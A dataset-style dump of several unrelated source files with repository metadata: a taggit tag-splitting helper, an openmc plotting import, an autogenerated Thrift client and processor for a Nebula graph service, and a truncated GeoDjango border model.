|
home/utils.py
|
thorin-schiffer/freeturn
|
a3f82ee867f87e62adc26541afc4de74aed4b186
|
[
"MIT"
] | 1
|
2018-12-13T20:18:36.000Z
|
2018-12-13T20:18:36.000Z
|
from taggit.utils import _parse_tags
def tags_splitter(s):
return [t.lower() for t in _parse_tags(s)]
| 18
| 46
| 0.731481
| 19
| 108
| 3.894737
| 0.736842
| 0.243243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 108
| 5
| 47
| 21.6
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d4efefb0c59b8befed0a3eb00155e4cf9605d8f0
| 79
|
py
|
Python
|
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
openmc_plasma_source/plotting/__init__.py
|
mdfaisal98/openmc-plasma-source
|
e55d61ce6d641f4d382ce298b6f6335cd46bc507
|
[
"MIT"
] | null | null | null |
from .plot_tokamak_source import plot_tokamak_source_3D, scatter_tokamak_source
| 79
| 79
| 0.924051
| 12
| 79
| 5.5
| 0.583333
| 0.590909
| 0.515152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013333
| 0.050633
| 79
| 1
| 79
| 79
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be0970343a4115fd20fce009d812d35335e013bd
| 30,187
|
py
|
Python
|
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | 1
|
2020-08-16T18:53:12.000Z
|
2020-08-16T18:53:12.000Z
|
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | null | null | null |
graph/GraphService.py
|
jievince/nebula-python
|
961097959aea83cb1bed6ee956cfe0fb002bd75b
|
[
"Apache-2.0"
] | null | null | null |
#
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
from __future__ import absolute_import
import six
from thrift.util.Recursive import fix_spec
from thrift.Thrift import *
from thrift.protocol.TProtocol import TProtocolException
from .ttypes import *
import common.ttypes
from thrift.Thrift import TProcessor
import pprint
import warnings
from thrift import Thrift
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.protocol import TCompactProtocol
from thrift.protocol import THeaderProtocol
fastproto = None
if not '__pypy__' in sys.builtin_module_names:
try:
from thrift.protocol import fastproto
except:
pass
all_structs = []
UTF8STRINGS = bool(0) or sys.version_info.major >= 3
from thrift.util.Decorators import *
class Iface:
def authenticate(self, username=None, password=None):
"""
Parameters:
- username
- password
"""
pass
def signout(self, sessionId=None):
"""
Parameters:
- sessionId
"""
pass
def execute(self, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
pass
class ContextIface:
def authenticate(self, handler_ctx, username=None, password=None):
"""
Parameters:
- username
- password
"""
pass
def signout(self, handler_ctx, sessionId=None):
"""
Parameters:
- sessionId
"""
pass
def execute(self, handler_ctx, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
pass
# HELPER FUNCTIONS AND STRUCTURES
class authenticate_args:
"""
Attributes:
- username
- password
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.username = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.password = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('authenticate_args')
if self.username != None:
oprot.writeFieldBegin('username', TType.STRING, 1)
oprot.writeString(self.username.encode('utf-8')) if UTF8STRINGS and not isinstance(self.username, bytes) else oprot.writeString(self.username)
oprot.writeFieldEnd()
if self.password != None:
oprot.writeFieldBegin('password', TType.STRING, 2)
oprot.writeString(self.password.encode('utf-8')) if UTF8STRINGS and not isinstance(self.password, bytes) else oprot.writeString(self.password)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.username is not None:
value = pprint.pformat(self.username, indent=0)
value = padding.join(value.splitlines(True))
L.append(' username=%s' % (value))
if self.password is not None:
value = pprint.pformat(self.password, indent=0)
value = padding.join(value.splitlines(True))
L.append(' password=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(authenticate_args)
authenticate_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'username', True, None, 2, ), # 1
(2, TType.STRING, 'password', True, None, 2, ), # 2
)
authenticate_args.thrift_struct_annotations = {
}
authenticate_args.thrift_field_annotations = {
}
def authenticate_args__init__(self, username=None, password=None,):
self.username = username
self.password = password
authenticate_args.__init__ = authenticate_args__init__
def authenticate_args__setstate__(self, state):
state.setdefault('username', None)
state.setdefault('password', None)
self.__dict__ = state
authenticate_args.__getstate__ = lambda self: self.__dict__.copy()
authenticate_args.__setstate__ = authenticate_args__setstate__
class authenticate_result:
"""
Attributes:
- success
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = AuthResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('authenticate_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.success is not None:
value = pprint.pformat(self.success, indent=0)
value = padding.join(value.splitlines(True))
L.append(' success=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(authenticate_result)
authenticate_result.thrift_spec = (
(0, TType.STRUCT, 'success', [AuthResponse, AuthResponse.thrift_spec, False], None, 2, ), # 0
)
authenticate_result.thrift_struct_annotations = {
}
authenticate_result.thrift_field_annotations = {
}
def authenticate_result__init__(self, success=None,):
self.success = success
authenticate_result.__init__ = authenticate_result__init__
def authenticate_result__setstate__(self, state):
state.setdefault('success', None)
self.__dict__ = state
authenticate_result.__getstate__ = lambda self: self.__dict__.copy()
authenticate_result.__setstate__ = authenticate_result__setstate__
class signout_args:
"""
Attributes:
- sessionId
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.sessionId = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('signout_args')
if self.sessionId != None:
oprot.writeFieldBegin('sessionId', TType.I64, 1)
oprot.writeI64(self.sessionId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.sessionId is not None:
value = pprint.pformat(self.sessionId, indent=0)
value = padding.join(value.splitlines(True))
L.append(' sessionId=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(signout_args)
signout_args.thrift_spec = (
None, # 0
(1, TType.I64, 'sessionId', None, None, 2, ), # 1
)
signout_args.thrift_struct_annotations = {
}
signout_args.thrift_field_annotations = {
}
def signout_args__init__(self, sessionId=None,):
self.sessionId = sessionId
signout_args.__init__ = signout_args__init__
def signout_args__setstate__(self, state):
state.setdefault('sessionId', None)
self.__dict__ = state
signout_args.__getstate__ = lambda self: self.__dict__.copy()
signout_args.__setstate__ = signout_args__setstate__
class execute_args:
"""
Attributes:
- sessionId
- stmt
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.sessionId = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.stmt = iprot.readString().decode('utf-8') if UTF8STRINGS else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('execute_args')
if self.sessionId != None:
oprot.writeFieldBegin('sessionId', TType.I64, 1)
oprot.writeI64(self.sessionId)
oprot.writeFieldEnd()
if self.stmt != None:
oprot.writeFieldBegin('stmt', TType.STRING, 2)
oprot.writeString(self.stmt.encode('utf-8')) if UTF8STRINGS and not isinstance(self.stmt, bytes) else oprot.writeString(self.stmt)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.sessionId is not None:
value = pprint.pformat(self.sessionId, indent=0)
value = padding.join(value.splitlines(True))
L.append(' sessionId=%s' % (value))
if self.stmt is not None:
value = pprint.pformat(self.stmt, indent=0)
value = padding.join(value.splitlines(True))
L.append(' stmt=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(execute_args)
execute_args.thrift_spec = (
None, # 0
(1, TType.I64, 'sessionId', None, None, 2, ), # 1
(2, TType.STRING, 'stmt', True, None, 2, ), # 2
)
execute_args.thrift_struct_annotations = {
}
execute_args.thrift_field_annotations = {
}
def execute_args__init__(self, sessionId=None, stmt=None,):
self.sessionId = sessionId
self.stmt = stmt
execute_args.__init__ = execute_args__init__
def execute_args__setstate__(self, state):
state.setdefault('sessionId', None)
state.setdefault('stmt', None)
self.__dict__ = state
execute_args.__getstate__ = lambda self: self.__dict__.copy()
execute_args.__setstate__ = execute_args__setstate__
class execute_result:
"""
Attributes:
- success
"""
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
__init__ = None
@staticmethod
def isUnion():
return False
def read(self, iprot):
if (isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if (isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocolAccelerate) and iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastproto is not None:
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExecutionResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if (isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if (isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocolAccelerate) and oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL)) and self.thrift_spec is not None and fastproto is not None:
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('execute_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = ' ' * 4
if self.success is not None:
value = pprint.pformat(self.success, indent=0)
value = padding.join(value.splitlines(True))
L.append(' success=%s' % (value))
return "%s(%s)" % (self.__class__.__name__, "\n" + ",\n".join(L) if L else '')
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
# Override the __hash__ function for Python3 - t10434117
if not six.PY2:
__hash__ = object.__hash__
all_structs.append(execute_result)
execute_result.thrift_spec = (
(0, TType.STRUCT, 'success', [ExecutionResponse, ExecutionResponse.thrift_spec, False], None, 2, ), # 0
)
execute_result.thrift_struct_annotations = {
}
execute_result.thrift_field_annotations = {
}
def execute_result__init__(self, success=None,):
self.success = success
execute_result.__init__ = execute_result__init__
def execute_result__setstate__(self, state):
state.setdefault('success', None)
self.__dict__ = state
execute_result.__getstate__ = lambda self: self.__dict__.copy()
execute_result.__setstate__ = execute_result__setstate__
class Client(Iface):
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self._iprot.trans.close()
if self._iprot is not self._oprot:
self._oprot.trans.close()
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def authenticate(self, username=None, password=None):
"""
Parameters:
- username
- password
"""
self.send_authenticate(username, password)
return self.recv_authenticate()
def send_authenticate(self, username=None, password=None):
self._oprot.writeMessageBegin('authenticate', TMessageType.CALL, self._seqid)
args = authenticate_args()
args.username = username
args.password = password
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_authenticate(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = authenticate_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "authenticate failed: unknown result");
def signout(self, sessionId=None):
"""
Parameters:
- sessionId
"""
self.send_signout(sessionId)
def send_signout(self, sessionId=None):
self._oprot.writeMessageBegin('signout', TMessageType.CALL, self._seqid)
args = signout_args()
args.sessionId = sessionId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.onewayFlush()
def execute(self, sessionId=None, stmt=None):
"""
Parameters:
- sessionId
- stmt
"""
self.send_execute(sessionId, stmt)
return self.recv_execute()
def send_execute(self, sessionId=None, stmt=None):
self._oprot.writeMessageBegin('execute', TMessageType.CALL, self._seqid)
args = execute_args()
args.sessionId = sessionId
args.stmt = stmt
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_execute(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = execute_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "execute failed: unknown result");
class Processor(Iface, TProcessor):
_onewayMethods = ("signout",)
def __init__(self, handler):
TProcessor.__init__(self)
self._handler = handler
self._processMap = {}
self._priorityMap = {}
self._processMap["authenticate"] = Processor.process_authenticate
self._priorityMap["authenticate"] = TPriority.NORMAL
self._processMap["signout"] = Processor.process_signout
self._priorityMap["signout"] = TPriority.NORMAL
self._processMap["execute"] = Processor.process_execute
self._priorityMap["execute"] = TPriority.NORMAL
def onewayMethods(self):
l = []
l.extend(Processor._onewayMethods)
return tuple(l)
@process_main()
def process(self,): pass
@process_method(authenticate_args, oneway=False)
def process_authenticate(self, args, handler_ctx):
result = authenticate_result()
try:
result.success = self._handler.authenticate(args.username, args.password)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'authenticate', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
@process_method(signout_args, oneway=True)
def process_signout(self, args, handler_ctx):
try:
self._handler.signout(args.sessionId)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'signout', ex)
result = Thrift.TApplicationException(message=str(ex))
@process_method(execute_args, oneway=False)
def process_execute(self, args, handler_ctx):
result = execute_result()
try:
result.success = self._handler.execute(args.sessionId, args.stmt)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'execute', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
Iface._processor_type = Processor
class ContextProcessor(ContextIface, TProcessor):
_onewayMethods = ("signout",)
def __init__(self, handler):
TProcessor.__init__(self)
self._handler = handler
self._processMap = {}
self._priorityMap = {}
self._processMap["authenticate"] = ContextProcessor.process_authenticate
self._priorityMap["authenticate"] = TPriority.NORMAL
self._processMap["signout"] = ContextProcessor.process_signout
self._priorityMap["signout"] = TPriority.NORMAL
self._processMap["execute"] = ContextProcessor.process_execute
self._priorityMap["execute"] = TPriority.NORMAL
def onewayMethods(self):
l = []
l.extend(ContextProcessor._onewayMethods)
return tuple(l)
@process_main()
def process(self,): pass
@process_method(authenticate_args, oneway=False)
def process_authenticate(self, args, handler_ctx):
result = authenticate_result()
try:
result.success = self._handler.authenticate(handler_ctx, args.username, args.password)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'authenticate', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
@process_method(signout_args, oneway=True)
def process_signout(self, args, handler_ctx):
try:
self._handler.signout(handler_ctx, args.sessionId)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'signout', ex)
result = Thrift.TApplicationException(message=str(ex))
@process_method(execute_args, oneway=False)
def process_execute(self, args, handler_ctx):
result = execute_result()
try:
result.success = self._handler.execute(handler_ctx, args.sessionId, args.stmt)
except:
ex = sys.exc_info()[1]
self._event_handler.handlerError(handler_ctx, 'execute', ex)
result = Thrift.TApplicationException(message=str(ex))
return result
ContextIface._processor_type = ContextProcessor
fix_spec(all_structs)
del all_structs
| 35.809015
| 339
| 0.720277
| 3,461
| 30,187
| 6.012135
| 0.064143
| 0.02499
| 0.020329
| 0.026913
| 0.844723
| 0.818195
| 0.803153
| 0.781719
| 0.766244
| 0.760044
| 0
| 0.008084
| 0.172226
| 30,187
| 842
| 340
| 35.851544
| 0.824636
| 0.028158
| 0
| 0.713396
| 1
| 0
| 0.023752
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115265
| false
| 0.043614
| 0.02648
| 0.024922
| 0.286604
| 0.012461
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
077a63095b95d7252e814f38ea45a215a1779bac
| 4,280
|
py
|
Python
|
geodjango/world/models.py
|
selfsryo/GeoDjangoTutorial
|
73f03f58ca417c06dca1c9275483a24f1134300e
|
[
"Apache-2.0"
] | null | null | null |
geodjango/world/models.py
|
selfsryo/GeoDjangoTutorial
|
73f03f58ca417c06dca1c9275483a24f1134300e
|
[
"Apache-2.0"
] | null | null | null |
geodjango/world/models.py
|
selfsryo/GeoDjangoTutorial
|
73f03f58ca417c06dca1c9275483a24f1134300e
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.gis.db import models
class Border(models.Model):
n03_001 = models.CharField(max_length=50, blank=True)
n03_002 = models.CharField(max_length=50, blank=True)
n03_003 = models.CharField(max_length=50, blank=True)
n03_004 = models.CharField(max_length=50, blank=True)
